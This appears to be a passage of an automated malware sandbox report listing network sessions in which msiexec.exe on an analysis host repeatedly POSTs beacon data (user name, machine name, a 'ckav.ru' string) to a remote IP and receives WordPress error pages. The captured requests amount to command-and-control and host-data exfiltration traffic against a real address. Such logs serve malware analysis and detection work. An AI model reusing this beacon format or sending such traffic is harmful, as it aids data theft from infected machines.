                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:18.317003965 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:18.317017078 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.549733137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:18.470282078 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:18.475107908 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:21.054193020 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:18 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:21.054260015 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:21.054301023 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.549734137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:21.205100060 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:21.209923983 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:23.780258894 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:21 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:23.780282021 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:23.780298948 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.549735137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:23.926706076 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:23.931600094 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:26.561662912 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:24 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:26.561687946 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:26.561701059 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.549736137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:26.704231977 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:26.709115982 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:29.245637894 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:27 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:29.245692015 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:44:29.245728970 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:44:29.245763063 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.549737137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:44:29.398833990 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:44:29.403729916 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:31.998550892 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:44:29 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:31.998613119 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
